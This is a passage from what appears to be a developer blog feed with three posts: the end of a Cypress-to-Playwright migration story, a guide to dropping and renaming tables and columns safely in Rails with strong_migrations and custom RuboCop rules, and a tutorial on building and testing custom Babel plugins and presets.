between two browser instances, aiding in test isolation during parallel test execution.</p><h3>Lack of necessary tools</h3><p>Cypress depends on plugins for many necessary tools.
These are features we have come to expect from any modern testing framework. Let's examine a few such tools and how Playwright handles them natively.</p><table><tr><td>Feature</td><td>Cypress plugin</td><td>Playwright implementation</td></tr><tr><td>Waiting until a particular event completes on a page</td><td><a href="https://github.com/NoriSte/cypress-wait-until">cypress-wait-until</a></td><td>Playwright offers a variety of APIs which pause the tests until a trigger event, like <a href="https://playwright.dev/docs/api/class-page#page-wait-for-url">waitForURL</a>, <a href="https://playwright.dev/docs/api/class-page#page-wait-for-request">waitForRequest</a>, <a href="https://playwright.dev/docs/api/class-locator#locator-wait-for">waitFor</a>, etc.</td></tr><tr><td>Adding step blocks in tests to logically group commands</td><td><a href="https://github.com/filiphric/cypress-plugin-steps">cypress-plugin-steps</a></td><td><a href="https://playwright.dev/docs/api/class-test#test-step">test.step</a></td></tr><tr><td>Ability to interact with iframes</td><td><a href="https://gitlab.com/kgroat/cypress-iframe">cypress-iframe</a></td><td><a href="https://playwright.dev/docs/api/class-framelocator">frameLocator</a></td></tr><tr><td>Filtering tests based on titles or tags</td><td><a href="https://github.com/cypress-io/cypress/tree/develop/npm/grep">@cypress/grep</a></td><td><a href="https://playwright.dev/docs/api/class-fullproject#full-project-grep">Playwright grep</a></td></tr></table><p>We must consider that
Playwright includes all these tools out of the box while still being more performant than Cypress. As we add such plugins in Cypress, the package size also increases.</p><h3>Random errors during tests due to Cypress's iframe execution model</h3><p>As discussed already, Cypress tests are executed inside a browser. They work by running Cypress as the main page and running the application being tested as an iframe within that page. This can lead to a lot of unexpected errors during test execution.</p><p>One of the most commonly encountered errors is related to security issues with cookies. When the tested application uses cookies, it might throw random errors during the Cypress run depending on the configuration. This is because the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#samesitesamesite-value">SameSite</a> configuration of the cookies might block them from being shared with the parent Cypress application. This can lead to cookies not being sent during API requests, causing authentication failures, and can also cause difficulties with <a href="https://docs.cypress.io/api/commands/session">session</a> configuration.</p><h2>Additional benefits of using Playwright</h2><h3>More resistance to test failures due to minor text changes</h3><p>At BigBinary, we follow a behavioral testing pattern where we verify the features, not minor details like text and styles. We made this decision to ensure that the tests don't fail due to minor changes in the application. While this is our go-to testing style, there are still some cases where we cannot avoid testing the text on the page (for example, the error message shown while testing negative test cases). While working with Cypress, this required our tests to be updated frequently whenever a minor text change was made in the application.</p><p>When we switched to Playwright, we got excited about how much we could customize it according to our needs.
This customization is available because, under the hood, it's still a Node.js application. We already use <a href="https://www.i18next.com/">i18next</a> to serve the text in our application, and we figured that the tests should use the same translation file. The translation keys remain consistent even when the texts are updated.</p><p>This minor change brought a huge difference in our test stability. The average number of tests we had to update each week decreased from <strong>22</strong> to <strong>2</strong>. That is a lot of time saved, which we could use to expand our test coverage instead of spending it fixing the existing suite.</p><h3>Ability to build our own in-house reporter</h3><p>When working with Cypress, we had to switch between many reporting tools, including Cypress Cloud, Currents.dev, and many other third-party tools. While they all had benefits and drawbacks, we couldn't find one that addressed all our needs. This is where the excellent reporter APIs offered by Playwright allowed us to write our own Playwright reporter: <a href="https://www.neeto.com/neetoplaydash">NeetoPlaydash</a>.</p><p>We currently use NeetoPlaydash for all our reporting needs and can customize it according to our requirements. Most importantly, we reduced our monthly reporting tool costs by <strong>77% ($405 to $90 per month)</strong>. We also didn't have to worry about exhausting the monthly test limits of third-party reporters, allowing us to run our tests more frequently, thus improving the stability of our applications.</p><h3>More coverage on tests relating to third-party integrations</h3><p>In Neeto products, we have support for third-party integrations. For example, in <a href="https://www.neeto.com/neetocal">NeetoCal</a> we have integrations for <a href="https://calendar.google.com/">Google Calendar</a>, <a href="https://zoom.us">Zoom</a>, <a href="https://teams.microsoft.com/">Microsoft Teams</a> and many more third-party applications.
Most of these applications have bot-detection algorithms in place to ensure that their platforms are not misused by bad actors. This also meant that we had to consider the integration features unautomatable when tested using Cypress.</p><p>Playwright does things differently. Since it's a Node.js application, it supports all the packages available for the platform. Because of this wide support, the community has developed a lot of tools for Playwright. We took advantage of these tools and plugins and were able to bypass the bot-detection algorithms that prevented us from testing the third-party integrations. This allowed us to test these integrations in our products effectively and ensure, with the help of automation tests, that the application ran smoothly.</p><h2>Conclusion</h2><p>We strongly believe that migrating to Playwright is one of the best decisions we have ever made. We did not know what we were missing out on until we decided to take the leap and migrate. We got better performance, less flakiness and more coverage from our test suites. The cost and time saved helped us divert resources to things that actually matter and let the tests do the testing, instead of spending additional resources maintaining the tests themselves.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Dropping tables, dropping columns and renaming columns in a safe way in Ruby on Rails]]></title>
       <author><name>Abhay V Ashokan</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-deleting-tables-columns-using-rubocop"/>
      <updated>2024-09-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-deleting-tables-columns-using-rubocop</id>
<content type="html"><![CDATA[<p>We are building <a href="https://neeto.com/cal">NeetoCal</a>, which is a Calendly alternative. Recently, we deployed the latest code to production. The code change involved deleting a table. To our horror, during the deployment, we noticed that some users experienced errors with status code 500 for a few minutes. This happened because the migration to drop the tables ran quickly and the tables got deleted. However, the old code was still referring to those tables.</p><p>This kind of issue is pretty common with schema migrations, especially when you're dropping tables or columns. If the migration finishes before the code deployment catches up, you end up with the old process still trying to access tables or columns that no longer exist. This mismatch can cause temporary errors, like the 500s we saw.</p><p>The safest bet might be to turn on maintenance mode every time we run a schema migration. At NeetoCal, we deploy changes to production every day, and we only want to schedule downtime when it's absolutely necessary. So this option was ruled out. We also heard that some companies manually restart their dynos during schema migrations to roll out the new code changes. However, this did not sit well with us either.</p><p>Most of the people we talked to solved this problem with two-step deployments.</p><p>Deployment 1: Deploy the code that does not use the table.</p><p>Deployment 2: Drop the table.</p><p>This can work, and it does work. However, we were worried about a potential edge case. Let's say that a piece of code is still referring to the table. After deployment 1 this code is working, and we don't see anything going wrong. It could be due to recent merges slipping in unnoticed, as we ship very fast.</p><p>However, when we do deployment 2, the migrations will run first, dropping the table, followed by the deployment of the code. When the new code boots up, we realize that one part of the app is not working.</p><p>Now we are in trouble.
We are in trouble because the table is gone. If we have taken a database backup, then we can restore it, but that causes all kinds of issues because we might not catch this bug for some time. In the meantime, other tables are getting new data. So restoring a backup is a messy solution.</p><p>The only solution is to fix the code, and now we need to fix it in a rush. That's what we want to avoid. Before we look at our solution, let's look at what we found when we evaluated other solutions.</p><h2>strong_migrations didn't protect against dropping a table</h2><p>At NeetoCal, we are using the <a href="https://github.com/ankane/strong_migrations">strong_migrations</a> gem to catch unsafe migrations. The gem catches unsafe migrations like <a href="https://github.com/ankane/strong_migrations?tab=readme-ov-file#removing-a-column">removing a column</a>, but it doesn't catch unsafe operations like dropping a table.</p><p>Upon some digging, we found <a href="https://github.com/ankane/strong_migrations/issues/49#issuecomment-419107996">this issue</a> where the author of the gem expressed unwillingness to add <code>drop_table</code> as an unsafe operation.</p><p>No worries. We can add dropping a table as an unsafe operation in <code>strong_migrations</code> ourselves. Here's how it can be done.</p><pre><code class="language-rb"># config/initializers/strong_migrations.rb
StrongMigrations.add_check do |method, args|
  if method == :drop_table
    stop! &quot;Dropping tables via migrations is discouraged.&quot;
  end
end</code></pre><p>To drop the table, we can use the <code>safety_assured</code> block provided by the <code>strong_migrations</code> gem to mark the step as safe.</p><pre><code class="language-rb"># db/migrate/20240809131941_drop_users.rb
class DropUsers &lt; ActiveRecord::Migration[8.0]
  def change
    safety_assured { drop_table :users }
  end
end</code></pre><p>While this gets the work done, it doesn't solve the &quot;some code still referring to the table&quot; problem.
Hence, this solution was a &quot;no go&quot; from our side.</p><h2>Sam wants to delay dropping of tables and columns</h2><p><a href="https://x.com/samsaffron">Sam Saffron</a> had run into similar problems. He came up with a solution and wrote about it in <a href="https://samsaffron.com/archive/2018/03/22/managing-db-schema-changes-without-downtime">this blog</a>.</p><p>His solution was not to drop the tables and columns immediately, but instead to use &quot;defer drops&quot; to drop columns or tables at least 30 minutes after the particular migration was run.</p><p>He introduced <a href="https://github.com/discourse/discourse/blob/6a3c8fe69c16ad7360046f145db6689c18e91005/lib/migration/column_dropper.rb">ColumnDropper</a> and <a href="https://github.com/discourse/discourse/commit/6a3c8fe69c16ad7360046f145db6689c18e91005#diff-d4fcc7d7501c6256f67a8a2ea0f1d3ef27136b86213809563d9b583592774c5d">TableDropper</a> to get this done.</p><p>We felt that this solution adds an extra layer of complexity, so we rejected it. In fact, we later found that they ran into some issues with &quot;defer drops&quot;, as discussed <a href="https://github.com/discourse/discourse/pull/6406">here</a>.</p><h2>Dropping tables and columns should be allowed if it follows a pattern</h2><p>After some internal discussion, we decided to follow a three-step deployment process to ensure zero downtime and easy rollback without any data loss.</p><p>In &quot;Deployment 1&quot;, we remove all the code that refers to the table we want to drop. This ensures that nothing in the application depends on that table anymore.</p><p>In &quot;Deployment 2&quot;, the table will be renamed. For example, the table <code>users</code> will be renamed to <code>users-deprecated-on-2024-08-09</code>. This step helps catch any dangling code that is still referring to the old table. If any part of the app still tries to use the table, the errors will show up, and we can fix the problem in one of two ways.
We can revert the migration and the code, or we can change the code. We have a choice. If we delete the table, then we don't have a choice.</p><p>Finally, in &quot;Deployment 3&quot;, once we're confident that the table is no longer in use, we can drop it completely. Since the table follows a specific naming pattern, it's clear that it's ready to be safely deleted.</p><p>We can follow a similar approach when dropping columns. To add an extra layer of safety, we mark the column that we need to drop as ignored using ActiveRecord's <a href="https://api.rubyonrails.org/classes/ActiveRecord/ModelSchema/ClassMethods.html#method-i-ignored_columns-3D">ignored_columns</a> method. For example, if we need to drop the <code>display_name</code> column from the <code>users</code> table, we start by marking it as ignored:</p><pre><code class="language-rb">class User &lt; ActiveRecord::Base
  self.ignored_columns += [:display_name]
end</code></pre><p>By doing this, even if the <code>display_name</code> column is still referenced in some lingering code, our model won't recognize it. This helps avoid any accidental references to the column in our code. Once we've successfully dropped the column, we can remove this line from the model.</p><p>If our model won't recognize it, then why do we need RuboCop for dropping a column? Once again, the answer is to avoid an edge case. Let's say that we are executing SQL directly, and this SQL refers to the column <code>display_name</code>. Since raw SQL is being used, adding this column to <code>ignored_columns</code> will have no impact.
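As a small, hypothetical illustration (all names here are made up, this is not NeetoCal code): `ignored_columns` only filters the model layer, while a hand-written SQL string embeds the column name directly and bypasses the model entirely.

```ruby
# Hypothetical sketch: ignored_columns hides a column from the model layer,
# but raw SQL still names the column directly.
IGNORED_COLUMNS = [:display_name].freeze

# A model-layer read can respect the ignore list...
def visible_columns(all_columns)
  all_columns - IGNORED_COLUMNS
end

# ...but a raw SQL string never passes through the model layer.
raw_sql = "SELECT display_name FROM users"

puts visible_columns([:id, :username, :display_name]).inspect # [:id, :username]
puts raw_sql.include?("display_name")                         # true
```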
Only once this column is deleted will we get to know about the error.</p><p>By renaming the column, we preserve the data, but at the same time all the lingering code would start failing.</p><h2>RuboCop rules to ensure the policy is followed</h2><p>Now the task was to build a custom cop to enforce the policy.</p><pre><code class="language-rb"># bad
drop_table :users

# bad
drop_table :users do |t|
  t.string :email, null: false
  t.string :first_name, null: false
end

# good
drop_table :users_deprecated_on_2024_08_09

# good
drop_table :users_deprecated_on_2024_08_09 do |t|
  t.string :email, null: false
  t.string :first_name, null: false
end</code></pre><p>We need to handle the removal of columns similarly.</p><pre><code class="language-rb"># bad
remove_column :users, :email

# bad
change_table :users do |t|
  t.remove :email
end

# good
remove_column :users, :email_deprecated_on_2024_08_09

# good
change_table :users do |t|
  t.remove :email_deprecated_on_2024_08_09
end</code></pre><p>We added these two cops to our <a href="https://github.com/bigbinary/rubocop-neeto">rubocop-neeto</a> repo.</p><h2>Safely renaming database columns</h2><p>Renaming a column brings the same challenges we discussed in the previous sections. Renaming a column directly will cause temporary downtime, since the new code references the new column name while the old code refers to the old column name.
To avoid downtime, we need to deliberately carry out this operation across multiple deployments.</p><p>Here are the steps to rename the <code>username</code> column to <code>display_name</code> in the <code>users</code> table:</p><p><strong>Deployment 1</strong></p><ol><li><strong>Create the new column</strong>: Start by adding the new <code>display_name</code> column to the table.</li></ol><pre><code class="language-rb">class AddDisplayNameToUsers &lt; ActiveRecord::Migration[8.0]
  def change
    add_column :users, :display_name, :string
  end
end</code></pre><ol start="2"><li><strong>Write to both columns</strong>: Update the app so it writes to both the old and new columns. <code>ActiveRecord</code> callbacks can help with this:</li></ol><pre><code class="language-rb">class User &lt; ApplicationRecord
  before_save do
    self.display_name = username if will_save_change_to_username?
  end
end</code></pre><ol start="3"><li><strong>Backfill data from the old column to the new column</strong>: Next, backfill the data from the <code>username</code> column to the <code>display_name</code> column:</li></ol><pre><code class="language-rb">User.update_all('display_name = username')</code></pre><p><strong>Deployment 2</strong></p><ol start="4"><li><strong>Move reads from the old column to the new column</strong>: Update the application to read from the <code>display_name</code> column instead of the old <code>username</code> column, and then remove the double writes to both columns.</li></ol><p><strong>Deployment 3</strong></p><ol start="5"><li><strong>Drop the old column</strong>: Finally, drop the old column once everything is in place.</li></ol><pre><code class="language-rb">class DropUsernameFromUsers &lt; ActiveRecord::Migration[8.0]
  def change
    remove_column :users, :username
  end
end</code></pre><p>This approach might seem tedious, but it's essential for achieving zero downtime during the migration and avoiding any edge cases. We can apply the same steps when renaming tables as well.
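The double-write-plus-backfill idea can be simulated in plain Ruby (a toy model with made-up names, no ActiveRecord involved) to see how both columns stay in sync during the migration window:

```ruby
# Toy simulation of the rename (hypothetical names, no Rails):
# Deployment 1 adds double writes and a backfill; Deployment 2 reads
# only from the new column.
class FakeUser
  attr_accessor :username, :display_name

  def initialize(username:, display_name: nil)
    @username = username
    @display_name = display_name
  end

  # Deployment 1: every write to the old column mirrors to the new one.
  def rename_username(value)
    self.username = value
    self.display_name = value
  end
end

users = [FakeUser.new(username: "amy"), FakeUser.new(username: "bob")]

# Deployment 1 backfill: copy pre-existing values into the new column.
users.each { |u| u.display_name ||= u.username }

# A write after the backfill still keeps both columns in sync.
users.first.rename_username("amelia")

# Deployment 2: reads come from display_name only.
puts users.map(&:display_name).inspect # ["amelia", "bob"]
```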
For more details on that process, check out <a href="https://github.com/ankane/strong_migrations?tab=readme-ov-file#renaming-a-table">the steps mentioned by the strong_migrations gem</a>.</p><p>Running schema migrations can be scary, especially when they involve dropping tables and columns. But with the right safeguards in place, we can confidently deploy updates without worrying about any surprises.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Introduction to custom Babel plugins]]></title>
       <author><name>Joseph Mathew</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-build-your-own-babel-plugins"/>
      <updated>2024-09-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-build-your-own-babel-plugins</id>
<content type="html"><![CDATA[<p><a href="https://babeljs.io/docs/">Babel</a> is a tool that allows us to write modern JavaScript while ensuring it works across older browsers. Instead of generating binary code like traditional compilers, Babel performs source-to-source transformations.</p><p>For example, with modern JavaScript, we might use arrow functions like this:</p><pre><code class="language-js">const add = (a, b) =&gt; a + b;</code></pre><p>This code works in modern browsers but not in older ones, like Internet Explorer, which does not support arrow functions. Without Babel, we would need to use older syntax to ensure compatibility, which limits our use of modern features. Babel solves this problem by transforming the modern code into an older syntax that more browsers can handle. For example, Babel converts the arrow function code above into the standard function syntax shown below, which is compatible with older browsers as well.</p><pre><code class="language-js">var add = function add(a, b) {
  return a + b;
};</code></pre><p>With Babel, we can write modern JavaScript code without worrying about browser compatibility. Babel uses several presets and plugins to achieve this.</p><h2>Plugins and Presets</h2><p><strong>Plugins</strong> are individual components that handle specific tasks in JavaScript code. For example, there are plugins for converting arrow functions to ES5 functions, JSX to React function calls, and so on.</p><p>There are two main types of plugins:</p><ul><li><p><strong>Syntax Plugins</strong>: These plugins help Babel understand new syntax that it doesn't recognize otherwise.
For example, Babel doesn't understand JSX syntax by default, so we need a plugin to enable this. <a href="https://babeljs.io/docs/babel-plugin-syntax-jsx">@babel/plugin-syntax-jsx</a> is a syntax plugin that allows Babel to recognize and parse JSX syntax.</p></li><li><p><strong>Transformation Plugins</strong>: These plugins help Babel convert code written in modern syntax into a format more widely supported by different browsers. For instance, <a href="https://babeljs.io/docs/babel-plugin-transform-react-jsx">@babel/plugin-transform-react-jsx</a> is a transformation plugin that converts JSX into React function calls.</p></li></ul><p><strong>Presets</strong> make things easier by bundling related plugins together. Instead of setting up each plugin separately, we can use a preset that includes all the necessary plugins. For instance, <a href="https://babeljs.io/docs/babel-preset-react">@babel/preset-react</a> includes both <code>@babel/plugin-syntax-jsx</code> and <code>@babel/plugin-transform-react-jsx</code>, handling both JSX recognition and transformation in one go.</p><h2>Plugin and Preset Order in Babel Configuration</h2><p>Babel processes plugins in the order they are listed in the Babel configuration file. This is important because the output of one plugin can affect the input of another. For example, if we want to convert JSX to React function calls, we need to ensure that the JSX syntax is recognized first. So, we should list the syntax plugin before the transformation plugin in the configuration file.</p><pre><code class="language-json">{
  &quot;plugins&quot;: [&quot;@babel/plugin-syntax-jsx&quot;, &quot;@babel/plugin-transform-react-jsx&quot;]
}</code></pre><p>Babel processes presets in reverse order.
This means that the last preset listed will be the first to be processed.</p><pre><code class="language-json">{
  &quot;presets&quot;: [&quot;@babel/preset-env&quot;, &quot;@babel/preset-react&quot;]
}</code></pre><p>For example, in the configuration above, the <code>@babel/preset-react</code> preset will be applied first, followed by <code>@babel/preset-env</code>, ensuring that React-specific transformations are handled before general environment compatibility transformations.</p><h2>Custom Babel Plugin</h2><p>While Babel offers a wide range of plugins and presets, its true potential lies in the ability to create custom plugins tailored to our project's specific needs. In the final section of this blog, we will explore a use case we encountered at <a href="https://www.neeto.com/">Neeto</a> and how we solved it with a custom Babel plugin. For now, let's focus on creating a simple plugin. Before we begin, it's important to understand a key concept: the AST (Abstract Syntax Tree).</p><h3>Abstract Syntax Tree (AST)</h3><p>An AST is a tree representation of the structure of a program. It breaks the code down into its constituent parts and represents them as nodes in a tree. Each node represents a different part of the code, such as a variable declaration, a function call, or a loop. Babel uses ASTs to analyze and transform JavaScript code. For example, consider the following code:</p><pre><code class="language-js">const sum = (x, y) =&gt; x + y;</code></pre><p>This is how its AST looks:</p><p><img src="/blog_images/2024/how-to-build-your-own-babel-plugins/ast_demo.gif" alt="AST Demo"></p><p>In this example, the root node is the <code>File</code> node, which represents the entire code file. Within it, there are several nested nodes like <code>VariableDeclarator</code>, <code>ArrowFunctionExpression</code> and so on, each representing a different part of the code.
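That node nesting can be mimicked with a plain JavaScript object. This is a heavily simplified, hypothetical stand-in for the real Babel AST (actual Babel nodes carry many more fields, such as source locations), but it shows how the parts of the expression map onto nested nodes:

```javascript
// Hypothetical, simplified stand-in for the AST of:
//   const sum = (x, y) => x + y;
const ast = {
  type: "VariableDeclaration",
  kind: "const",
  declarations: [
    {
      type: "VariableDeclarator",
      id: { type: "Identifier", name: "sum" },
      init: {
        type: "ArrowFunctionExpression",
        params: [
          { type: "Identifier", name: "x" },
          { type: "Identifier", name: "y" },
        ],
        body: {
          type: "BinaryExpression",
          operator: "+",
          left: { type: "Identifier", name: "x" },
          right: { type: "Identifier", name: "y" },
        },
      },
    },
  ],
};

// Walking the tree recovers any part of the original code, e.g. the operator.
console.log(ast.declarations[0].init.body.operator); // "+"
```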
As shown in the animation, hovering over each node highlights the corresponding code segment on the left-hand side. To explore and interact with both the code and its AST, the <a href="https://astexplorer.net/">AST Explorer</a> tool can be used.</p><h3>Babel transpile stages</h3><p>Now that we have a basic understanding of ASTs, let's see how Babel works. It has three main stages:</p><ul><li><strong>Parse Stage</strong>: In this stage, the code passed to Babel as input is converted into an AST. This is done using the <a href="https://babeljs.io/docs/babel-parser">@babel/parser</a> package.</li><li><strong>Transform Stage</strong>: This is the stage where Babel traverses and modifies the AST using the <a href="https://babeljs.io/docs/babel-traverse">@babel/traverse</a> package. This is where plugins come into play to apply specific transformations. It's important to note that this is the only stage we can influence. In the next section, we'll see how to create a custom Babel plugin.</li><li><strong>Generate Stage</strong>: Once the AST has been modified, it needs to be converted back into code. This is done using the <a href="https://babeljs.io/docs/babel-generator">@babel/generator</a> package.</li></ul><h3>Creating a Babel Plugin</h3><p>As mentioned in the previous section, Babel plugins apply transformations to the AST, and this is the only stage we can influence. So, let's see how to create a simple Babel plugin. We will create a plugin that converts all <code>==</code> operators in the code to <code>===</code>. This is a common transformation that developers often use to ensure strict equality checks in their code.</p><p>First, let's set up the project structure for our plugin.</p><ul><li><p><strong>Step 1</strong>: Create a new directory and initialize a new npm package for the plugin. Let's prefix the package name with <code>babel-plugin-</code>.
This naming convention clearly indicates that the package is a Babel plugin, making it easier for others to identify its purpose.</p><pre><code class="language-bash">mkdir babel-plugin-strict-equality
cd babel-plugin-strict-equality
npm init -y</code></pre></li><li><p><strong>Step 2</strong>: Create a file named <code>index.js</code> in the root of the plugin directory. This file will contain the logic for the plugin.</p><pre><code class="language-bash">touch index.js</code></pre></li></ul><p>Now that we have set up the project structure, let's start writing the plugin code.</p><p>To transform the code, we need to traverse the AST generated in the parse stage. We can do this by creating a <code>visitor</code> object that defines the transformations to be applied to the AST. The visitor object contains methods that correspond to different types of nodes in the AST. When Babel encounters a node of a particular type, it calls the corresponding method in the <code>visitor</code> object to apply the transformation.</p><p>To understand this better, let's look at a code example that we want to transform:</p><pre><code class="language-js">a == b;</code></pre><p>We want to transform this code into:</p><pre><code class="language-js">a === b;</code></pre><p>First, let's examine the AST representation of the original code:</p><pre><code class="language-json">{
  &quot;type&quot;: &quot;File&quot;,
  &quot;program&quot;: {
    &quot;type&quot;: &quot;Program&quot;,
    &quot;body&quot;: [
      {
        &quot;type&quot;: &quot;ExpressionStatement&quot;,
        &quot;expression&quot;: {
          &quot;type&quot;: &quot;BinaryExpression&quot;,
          &quot;left&quot;: {
            &quot;type&quot;: &quot;Identifier&quot;,
            &quot;name&quot;: &quot;a&quot;
          },
          &quot;operator&quot;: &quot;==&quot;,
          &quot;right&quot;: {
            &quot;type&quot;: &quot;Identifier&quot;,
            &quot;name&quot;: &quot;b&quot;
          }
        }
      }
    ]
  }
}</code></pre><p>Here, our goal is to modify the <code>BinaryExpression</code> node, changing its operator from <code>==</code> to <code>===</code>. To achieve this, we need to create a visitor method for <code>BinaryExpression</code>. When Babel encounters a <code>BinaryExpression</code> node with the operator <code>==</code> in the AST, it will call our visitor method to apply the transformation.</p><p>So, let's write the code for our plugin. Open the <code>index.js</code> file we created earlier and add the following code:</p><pre><code class="language-js">module.exports = function () {
  return {
    visitor: {
      BinaryExpression(path) {
        if (path.node.operator === &quot;==&quot;) {
          path.node.operator = &quot;===&quot;;
        }
      },
    },
  };
};</code></pre><p>This plugin will traverse the AST, identify <code>BinaryExpression</code> nodes with the <code>==</code> operator, and replace the operator with <code>===</code>, ensuring strict equality checks are used throughout the code.</p><p>Now that we have written the plugin code, let's see how to test it.</p><h3>Adding tests for the plugin</h3><p>To ensure that our plugin works as expected, we need to write tests. For this, we can use the <a href="https://www.npmjs.com/package/babel-plugin-tester">babel-plugin-tester</a> and <a href="https://www.npmjs.com/package/jest?activeTab=readme">jest</a> packages. <code>babel-plugin-tester</code> is a utility that makes it easy to test Babel plugins, while <code>jest</code> is a popular testing framework for JavaScript. Let's see how we can add tests for our plugin.</p><ul><li><p><strong>Step 1:</strong> Install the required packages:</p><pre><code class="language-bash">yarn add --dev babel-plugin-tester jest</code></pre></li><li><p><strong>Step 2:</strong> Create a folder named <code>tests</code> in the project directory.
Inside this folder, create a test file named <code>strict-equality.spec.js</code> with the following content:</p><pre><code class="language-js">const pluginTester = require(&quot;babel-plugin-tester&quot;);
const plugin = require(&quot;../index&quot;);

pluginTester({
  plugin,
  tests: {
    &quot;should convert == to ===&quot;: {
      code: &quot;a == b;&quot;,
      output: &quot;a === b;&quot;,
    },
    &quot;should not modify == inside a string or comment&quot;: {
      code: `
        const str = &quot;a == b&quot;;
        // comparison: a == b
      `,
      output: `
        const str = &quot;a == b&quot;;
        // comparison: a == b
      `,
    },
  },
});</code></pre><p>In the code above, we are passing an object to the <code>pluginTester</code> function with two keys: <code>plugin</code> and <code>tests</code>. The <code>plugin</code> key specifies the Babel plugin we want to test, while the <code>tests</code> key contains an object defining our test cases. Each test case includes a <code>code</code> key with the input code and an <code>output</code> key with the expected result after the plugin is applied. The <code>pluginTester</code> function runs each test case, comparing the actual output with the expected output. If they match, the test passes; if they don't, it fails.</p></li><li><p><strong>Step 3:</strong> Now, to run the tests, use the following command:</p><pre><code class="language-bash">yarn jest</code></pre><p>This will run the tests and display the results in the terminal. If the tests pass, it means our plugin is working as expected.</p><p><img src="/blog_images/2024/how-to-build-your-own-babel-plugins/jest-result.png" alt="jest-result"></p></li></ul><h3>Testing the plugin in a real project using yalc</h3><p>While <code>pluginTester</code> helps cover many edge cases, it's challenging to anticipate all possible scenarios.
For this, we need to run our plugin in real projects, and we have to achieve this without publishing our package to the remote registry right away.</p><p>To achieve this, we can use the <a href="https://www.npmjs.com/package/yalc">yalc</a> package. <code>yalc</code> is a tool that allows us to work on npm packages as if they were published, but without actually publishing them. It copies our local package into a store on our machine, from which we can install and use it in other projects. Let's see how we can use <code>yalc</code> to test our plugin.</p><ul><li><p><strong>Step 1:</strong> Install <code>yalc</code> globally.</p><pre><code class="language-bash">yarn global add yalc</code></pre></li><li><p><strong>Step 2:</strong> Publish the plugin using <code>yalc</code> by running the following command in the plugin directory.</p><pre><code class="language-bash">yalc publish</code></pre><p>This publishes the local package to <code>yalc</code>'s store.</p></li><li><p><strong>Step 3:</strong> Install the plugin in the project using <code>yalc</code> by running the following command in the project directory.</p><pre><code class="language-bash">yalc add babel-plugin-strict-equality</code></pre><p>This will add the plugin to the project as if it were installed from the npm registry.</p></li><li><p><strong>Step 4:</strong> Include the plugin in the Babel configuration.</p><pre><code class="language-json">{
  &quot;plugins&quot;: [&quot;babel-plugin-strict-equality&quot;]
}</code></pre></li></ul><p>After testing the plugin in a real project and being satisfied with the results, it can be published to the npm registry.</p><h3>Creating a Babel preset</h3><p>If we have multiple plugins that we want to bundle together, we can create a Babel preset. As mentioned earlier, presets make it easier to configure Babel by bundling related plugins together. 
Here is an example of how we can create a Babel preset that includes the <code>babel-plugin-strict-equality</code> plugin:</p><ul><li><p><strong>Step 1</strong>: Create a new directory for the preset and initialize a new npm package for it. Let's prefix the package name with <code>babel-preset-</code> to indicate that it is a Babel preset.</p><pre><code class="language-bash">mkdir babel-preset-strict-equality
cd babel-preset-strict-equality
npm init -y</code></pre></li><li><p><strong>Step 2</strong>: Create a folder named <code>plugins</code> in the root of the preset directory. This folder will contain the plugins that we want to include in the preset. In our case, we have only one plugin, so create a file named <code>strict-equality.js</code> inside the <code>plugins</code> folder and add our plugin code to it.</p><pre><code class="language-js">module.exports = function () {
  return {
    visitor: {
      BinaryExpression(path) {
        if (path.node.operator === &quot;==&quot;) {
          path.node.operator = &quot;===&quot;;
        }
      },
    },
  };
};</code></pre></li><li><p><strong>Step 3</strong>: Create a file named <code>index.js</code> in the root of the preset directory. This file will contain the logic for bundling the plugins together.</p><pre><code class="language-js">const strictEquality = require(&quot;./plugins/strict-equality.js&quot;);

module.exports = function () {
  return {
    plugins: [strictEquality],
  };
};</code></pre><p>Here we are returning an object with a <code>plugins</code> key that contains an array of plugins to be included in the preset. If there are multiple plugins, we can list them all in this array. 
We can now publish this preset to the npm registry and use it in our Babel configuration.</p></li><li><p><strong>Step 4</strong>: To use the preset in the Babel configuration, include it like this:</p><pre><code class="language-json">{
  &quot;presets&quot;: [&quot;babel-preset-strict-equality&quot;]
}</code></pre></li></ul><p>Here we have created a simple Babel plugin and preset. This is just the tip of the iceberg when it comes to creating custom Babel plugins. We can create plugins to handle a wide range of tasks, from optimizing code to adding new features. To know more about the functions and methods available in Babel, you can refer to the <a href="https://github.com/jamiebuilds/babel-handbook/blob/master/translations/en/plugin-handbook.md">Babel handbook</a>. In the next section, we will see the use case we encountered at Neeto and how we solved it using a custom Babel plugin.</p><h2>Motivation behind babel-preset-neeto</h2><p>At <a href="https://neeto.com/">Neeto</a>, we build our own custom plugins and presets to streamline and simplify our development workflow. Let's look into one of the specific plugins we've designed and implemented and see how it enhances our development process.</p><p>We use <a href="https://github.com/pmndrs/zustand">Zustand</a> for global state management. Zustand provides a <code>shallow</code> function, which allows us to construct a single object with multiple state picks inside. This helps prevent unnecessary re-renders by using shallow equality to check if the selected state values have changed. Let's consider the following example:</p><pre><code class="language-js">import { shallow } from &quot;zustand/shallow&quot;;

const { id, name } = useSessionStore(
  store =&gt; ({
    id: store[sessionId]?.user.id,
    name: store[sessionId]?.user.name,
  }),
  shallow
);</code></pre><p>In this example, the component only re-renders if <code>id</code> or <code>name</code> changes. If any other state in the store changes, the component will not re-render. 
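To see why the shallow check prevents those re-renders, it helps to look at what a shallow comparison does. The following is an illustrative stand-alone sketch, not Zustand's actual implementation:

```javascript
// Illustrative shallow-equality check, similar in spirit to zustand/shallow
// (this is NOT the library's actual implementation).
const shallowEqual = (a, b) => {
  const keysA = Object.keys(a);
  const keysB = Object.keys(b);
  if (keysA.length !== keysB.length) return false;
  // Compare each picked value by identity, one level deep.
  return keysA.every(key => Object.is(a[key], b[key]));
};

// Two selector results holding the same picked values compare equal,
// so the subscriber can skip re-rendering.
console.log(shallowEqual({ id: 1, name: "Oliver" }, { id: 1, name: "Oliver" })); // true
console.log(shallowEqual({ id: 1, name: "Oliver" }, { id: 2, name: "Oliver" })); // false
```

Because the selector builds a fresh object on every store update, a reference comparison would always report a change; comparing one level deep is what lets unrelated store updates be ignored.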
